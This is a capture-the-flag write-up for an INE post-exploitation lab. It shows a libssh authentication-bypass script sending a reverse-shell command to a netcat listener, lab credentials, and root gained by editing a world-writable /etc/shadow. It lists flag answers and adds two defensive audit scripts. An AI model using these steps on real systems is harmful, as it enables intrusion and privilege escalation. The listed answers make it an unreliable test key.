System-Host Based Attacks CTF 1
Overview
Post-Exploitation refers to the phase in a penetration test or cyberattack that occurs after an attacker successfully gains access to a system or network. During this phase, the attacker aims to maximize the value of their access by escalating privileges, maintaining persistence, and gathering sensitive information. Post-exploitation techniques include pivoting to other systems, extracting passwords, exfiltrating confidential data, and leveraging compromised systems to further penetrate the network. The goal is to identify critical assets, assess the extent of the breach, and map out pathways for potential lateral movement within the target environment. Post-exploitation also focuses on covering tracks to evade detection and ensuring continued access, emphasizing the need for strong monitoring and rapid response mechanisms to prevent further compromise.
This lab is designed to challenge and refine your skills in Post-Exploitation techniques, focusing on identifying and uncovering hidden information within a target machine.
Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you’ve gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you’ve learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.
Objective: Execute Post-Exploitation techniques on the target to uncover hidden flags and fully exploit the compromised environment.
Flags to Capture:
Flag 1: The file that stores user account details is worth a closer look. (target1.ine.local)
Flag 2: User groups might reveal more than you expect.
Flag 3: Scheduled tasks often have telling names. Investigate the cron jobs to uncover the secret.
Flag 4: DNS configurations might point you in the right direction. Also, explore the home directories for stored credentials.
Flag 5: Use the discovered credentials to gain higher privileges and explore the root's home directory on target2.ine.local.
Writeup
Flag 1
Nmap
┌──(root㉿INE)-[~]
└─# nmap -p- --min-rate 10000 target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-18 13:15 IST
Nmap scan report for target1.ine.local (192.174.97.4)
Host is up (0.000024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:42:C0:AE:61:04 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.22 seconds
┌──(root㉿INE)-[~]
└─# nmap -sC -sV -p22 target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-18 13:19 IST
Nmap scan report for target1.ine.local (192.174.97.4)
Host is up (0.000055s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 31:e2:1d:f1:b2:39:0c:a3:ec:db:01:4a:eb:a2:39:c7 (RSA)
MAC Address: 02:42:C0:AE:61:04 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
libssh 0.8.3
┌──(root㉿INE)-[~]
└─# searchsploit libssh
--------------------------------------------- ---------------------
 Exploit Title                               | Path
--------------------------------------------- ---------------------
libSSH - Authentication Bypass               | linux/remote/45638.py
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access   | linux/remote/46307.py
--------------------------------------------- ---------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿INE)-[~]
└─# cat script.py
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging
# pip3 install paramiko==2.0.8
#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.basicConfig(stream=sys.stdout)
bufsize = 2048

def execute(hostname, port, command):
    sock = socket.socket()
    try:
...
┌──(root㉿INE)-[~]
└─# python3 script.py target1.ine.local 22 "/bin/bash -i >& /dev/tcp/192.174.97.2/4444 0>&1"
┌──(root㉿INE)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.174.97.2] from (UNKNOWN) [192.174.97.4] 57006
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
[user@target1 /]$
[user@target1 home]$ cat /etc/passwd
cat /etc/passwd
root:x:0:0::/root:/usr/bin/bash
alpm:x:980:980:Arch Linux Package Management:/:/usr/bin/nologin
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin
http:x:33:33::/srv/http:/usr/bin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin
systemd-coredump:x:979:979:systemd Core Dumper:/:/usr/bin/nologin
systemd-network:x:978:978:systemd Network Management:/:/usr/bin/nologin
systemd-oom:x:977:977:systemd Userspace OOM Killer:/:/usr/bin/nologin
systemd-journal-remote:x:976:976:systemd Journal Remote:/:/usr/bin/nologin
systemd-resolve:x:975:975:systemd Resolver:/:/usr/bin/nologin
systemd-timesync:x:974:974:systemd Time Synchronization:/:/usr/bin/nologin
tss:x:973:973:tss user for tpm2:/:/usr/bin/nologin
uuidd:x:68:68::/:/usr/bin/nologin
user:x:1000:1000::/home/user:/usr/bin/bash
FLAG1_***:x:1001:984::/home/FLAG1_***/usr/bin/bash
Answer
aaa9d7895bf64f2bb41ae82eb5c26629
Flag 2
[user@target1 home]$ cat /etc/group
cat /etc/group
root:x:0:root
sys:x:3:bin
mem:x:8:
ftp:x:11:
mail:x:12:
log:x:19:
smmsp:x:25:
proc:x:26:
games:x:50:
lock:x:54:
network:x:90:
floppy:x:94:
scanner:x:96:
power:x:98:
nobody:x:65534:
adm:x:999:daemon
wheel:x:998:
utmp:x:997:
audio:x:996:
disk:x:995:
input:x:994:
kmem:x:993:
kvm:x:992:
lp:x:991:
optical:x:990:
render:x:989:
sgx:x:988:
storage:x:987:
tty:x:5:
uucp:x:986:
video:x:985:
users:x:984:
groups:x:983:
systemd-journal:x:982:
rfkill:x:981:
alpm:x:980:
bin:x:1:daemon
daemon:x:2:bin
http:x:33:
dbus:x:81:
systemd-coredump:x:979:
systemd-network:x:978:
systemd-oom:x:977:
systemd-journal-remote:x:976:
systemd-resolve:x:975:
systemd-timesync:x:974:
tss:x:973:
uuidd:x:68:
user:x:1000:
# FLAG2_***
Answer
8a15b058b474446ca38adb46f04d7225
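The Flag 1 and Flag 2 steps both come down to reading account files by eye. As an added example (not part of the lab or INE's material), the audit below parses passwd- and group-format text and flags the things a defender would want surfaced automatically: malformed lines, extra UID-0 accounts, non-system accounts with an interactive shell, and non-empty privileged groups. The sample data is constructed to mirror the shape of the output above, including a six-field passwd line and a comment-like line in the group file.

```python
"""Audit passwd- and group-format files for entries worth a closer look.

Added example, not from the lab. Samples are constructed: one extra
interactive-shell account, one malformed passwd line (shell fused onto
the home directory, so only six fields) and a comment-like group line.
"""
INTERACTIVE_SHELLS = {"/bin/bash", "/usr/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/zsh"}

SAMPLE_PASSWD = """root:x:0:0::/root:/usr/bin/bash
bin:x:1:1::/:/usr/bin/nologin
user:x:1000:1000::/home/user:/usr/bin/bash
hidden:x:1001:984::/home/hidden/usr/bin/bash
"""

SAMPLE_GROUP = """root:x:0:root
wheel:x:998:
user:x:1000:
# not a group entry
"""

def audit_passwd(text):
    """Return (line_no, kind, detail) for malformed lines (not 7 fields or a
    non-numeric UID), non-root UID-0 accounts and UID>=1000 interactive shells."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((no, "malformed", line))
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        if uid == "0" and name != "root":
            findings.append((no, "uid0", name))
        elif shell in INTERACTIVE_SHELLS and int(uid) >= 1000:
            findings.append((no, "interactive", name))
    return findings

def audit_group(text, privileged=("root", "wheel", "sudo")):
    """Return (line_no, kind, detail) for lines that are not name:pw:gid:members
    and for privileged groups whose member list is non-empty."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 4 or not fields[2].isdigit():
            findings.append((no, "malformed", line))
            continue
        name, _pw, _gid, members = fields
        if name in privileged and members:
            findings.append((no, "privileged-members", f"{name}: {members}"))
    return findings
```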
Flag 3
Answer
c61a731d37f343bb97ab3afdabc9ebe5
Flag 4
[user@target1 /]$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.174.97.4 target1.ine.local target1
#FLAG4_***
192.174.97.2 INE
192.174.97.3 target2.ine.local
192.174.97.4 target1.ine.local
Answer
6d7ae0a94bda4fca83197f1cac17d71a
Flag 5
We stumbled on the credentials by accident earlier: john:Pass@john123
┌──(root㉿INE)-[~]
└─# ssh john@target2.ine.local
john@target2.ine.local's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.8.0-39-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
john@target2:~$
-rwxrwxrwx 1 root root 89 Jun 17 2024 start.sh
john@target2:/home$ cat start.sh
#!/bin/bash
service apache2 start
service ssh start
service postfix start
supervisord -n
john@target2:/home$ find / -not -type l -perm -o+w
...
/sys/firmware
find: ‘/root’: Permission denied
/dev/pts/ptmx
/dev/mqueue
/dev/shm
/dev/null
/dev/random
/dev/full
/dev/tty
/dev/zero
/dev/urandom
/etc/shadow
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/dovecot/private’: Permission denied
john@target2:/home$ cat /etc/shadow
root:*:19977:0:99999:7:::
daemon:*:19977:0:99999:7:::
bin:*:19977:0:99999:7:::
sys:*:19977:0:99999:7:::
sync:*:19977:0:99999:7:::
games:*:19977:0:99999:7:::
man:*:19977:0:99999:7:::
lp:*:19977:0:99999:7:::
mail:*:19977:0:99999:7:::
news:*:19977:0:99999:7:::
uucp:*:19977:0:99999:7:::
proxy:*:19977:0:99999:7:::
www-data:*:19977:0:99999:7:::
backup:*:19977:0:99999:7:::
list:*:19977:0:99999:7:::
irc:*:19977:0:99999:7:::
gnats:*:19977:0:99999:7:::
nobody:*:19977:0:99999:7:::
_apt:*:19977:0:99999:7:::
systemd-network:*:20041:0:99999:7:::
systemd-resolve:*:20041:0:99999:7:::
mysql:!:20041:0:99999:7:::
messagebus:*:20041:0:99999:7:::
ntp:*:20041:0:99999:7:::
postfix:*:20041:0:99999:7:::
dovecot:*:20041:0:99999:7:::
dovenull:*:20041:0:99999:7:::
bind:*:20041:0:99999:7:::
sshd:*:20041:0:99999:7:::
Debian-snmp:!:20041:0:99999:7:::
telnetd:*:20041:0:99999:7:::
john:$y$j9T$Wg2TIAwOkbGDxz1JzXUui.$N66Tm9Am8yo3/dpqEOKDj87y7jKpt.hzsFOAkEFpqMC:20041:0:99999:7:::
john@target2:/home$ nano /etc/shadow
john@target2:/home$ su root
root@target2:/home# cd /root
root@target2:~# ls
flag.txt
root@target2:~# cat flag.txt
FLAG5_***
root@target2:~#
Answer
1c808d74febc4dff83c18a97f1f87360
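The root of Flag 5 is a world-writable /etc/shadow, which the `find -perm -o+w` sweep above exposes. As an added example (not part of the writeup), the check below does the same test for a fixed list of sensitive paths using file modes rather than a full filesystem walk, so it can run as a cheap periodic integrity check; to stay runnable offline it builds a throwaway directory with one correctly protected and one world-writable file instead of touching the real /etc.

```python
"""Flag sensitive files that are writable by 'other' (mode bit o+w).

Added example, not from the lab. demo() constructs its own files under a
temporary directory; in real use, pass paths such as /etc/shadow, /etc/passwd,
/etc/sudoers and /etc/crontab to world_writable().
"""
import os
import shutil
import stat
import tempfile

def world_writable(paths):
    """Return (path, octal_mode) for each existing regular file with o+w set.

    Symlinks are not followed, matching the writeup's 'find -not -type l'."""
    hits = []
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue                      # absent files are not a finding
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
            hits.append((p, oct(stat.S_IMODE(st.st_mode))))
    return hits

def demo():
    """Build one protected (0640) and one world-writable (0666) shadow-like
    file plus a missing path, and return what world_writable() reports."""
    d = tempfile.mkdtemp()
    try:
        good = os.path.join(d, "shadow")
        bad = os.path.join(d, "shadow-bad")
        for path, mode in ((good, 0o640), (bad, 0o666)):
            with open(path, "w") as f:
                f.write("root:*:19977:0:99999:7:::\n")   # constructed line
            os.chmod(path, mode)
        return world_writable([good, bad, os.path.join(d, "missing")])
    finally:
        shutil.rmtree(d)

if __name__ == "__main__":
    for path, mode in demo():
        print(f"world-writable: {path} ({mode})")
```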